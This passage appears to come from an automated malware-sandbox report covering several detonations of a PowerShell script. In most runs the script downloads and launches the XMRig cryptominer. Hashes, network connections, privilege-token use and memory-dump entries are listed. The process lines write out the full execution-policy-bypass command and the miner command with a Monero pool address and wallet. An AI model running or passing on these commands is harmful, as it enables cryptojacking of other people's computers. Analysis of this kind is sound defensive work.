memory/1908-113-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-114-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-115-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-116-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-117-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-118-0x00007FF797D30000-0x00007FF798963000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win11-20240508-en
Max time kernel
1791s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3884 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3884 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.227.14:443 | tcp |
Files
memory/3884-0-0x00007FFE0ABB3000-0x00007FFE0ABB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fp0ewzqu.31j.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3884-9-0x000002007E5B0000-0x000002007E5D2000-memory.dmp
memory/3884-10-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-11-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-12-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-14-0x000002007EA90000-0x000002007EAA2000-memory.dmp
memory/3884-15-0x000002007E980000-0x000002007E98A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1952-46-0x00000206943C0000-0x00000206943E0000-memory.dmp
memory/1952-47-0x0000020694410000-0x0000020694430000-memory.dmp
memory/1952-48-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/3884-49-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-51-0x00007FFE0ABB3000-0x00007FFE0ABB5000-memory.dmp
memory/1952-50-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-52-0x0000020694430000-0x0000020694450000-memory.dmp
memory/1952-53-0x0000020694450000-0x0000020694470000-memory.dmp
memory/1952-54-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-55-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-57-0x0000020694450000-0x0000020694470000-memory.dmp
memory/1952-56-0x0000020694430000-0x0000020694450000-memory.dmp
memory/1952-58-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-59-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-60-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-61-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-62-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-63-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-64-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-65-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-66-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-67-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-68-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-69-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-70-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-71-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-72-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-73-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-74-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-75-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-76-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-77-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-78-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-79-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-80-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-81-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-82-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-83-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-84-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-85-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-86-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-87-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-88-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-89-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-90-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-91-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-92-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-93-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-94-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-95-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-96-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-97-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-98-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-99-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-100-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-101-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-102-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-103-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-104-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-105-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-106-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-107-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-108-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-109-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-110-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-111-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-112-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-113-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-114-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-115-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-116-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5076 wrote to memory of 4724 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5076 wrote to memory of 4724 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
memory/5076-0-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/5076-6-0x000001F97B950000-0x000001F97B972000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l50dkdnb.4ga.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5076-11-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/5076-12-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/5076-14-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/5076-15-0x000001F97C3F0000-0x000001F97C402000-memory.dmp
memory/5076-16-0x000001F97B3D0000-0x000001F97B3DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4724-47-0x000001FDE72C0000-0x000001FDE72E0000-memory.dmp
memory/4724-48-0x000001FDE7310000-0x000001FDE7330000-memory.dmp
memory/4724-49-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/5076-51-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/4724-50-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-53-0x000001FE799C0000-0x000001FE799E0000-memory.dmp
memory/4724-54-0x000001FE79790000-0x000001FE797B0000-memory.dmp
memory/5076-52-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/5076-55-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/4724-56-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-57-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-59-0x000001FE79790000-0x000001FE797B0000-memory.dmp
memory/4724-58-0x000001FE799C0000-0x000001FE799E0000-memory.dmp
memory/4724-60-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-61-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-62-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-63-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-64-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-65-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-66-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-67-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-68-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-69-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-70-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-71-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-72-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-73-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-74-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-75-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-76-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-77-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-78-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-79-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-80-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-81-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-82-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-83-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-84-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-85-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-86-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-87-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-88-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-89-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-90-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-91-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-92-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-93-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-94-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-95-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-96-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-97-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-98-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-99-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-100-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-101-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-102-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-103-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-104-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-105-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-106-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-107-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-108-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-109-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-110-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-111-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-112-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-113-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-114-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-115-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-116-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-117-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
memory/4724-118-0x00007FF62BB60000-0x00007FF62C793000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win11-20240508-en
Max time kernel
1702s
Max time network
1711s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4260-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blu3upbx.mhy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4260-9-0x0000010EAB620000-0x0000010EAB642000-memory.dmp
memory/4260-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
memory/4260-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
memory/4260-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
memory/4260-13-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp
memory/4260-14-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
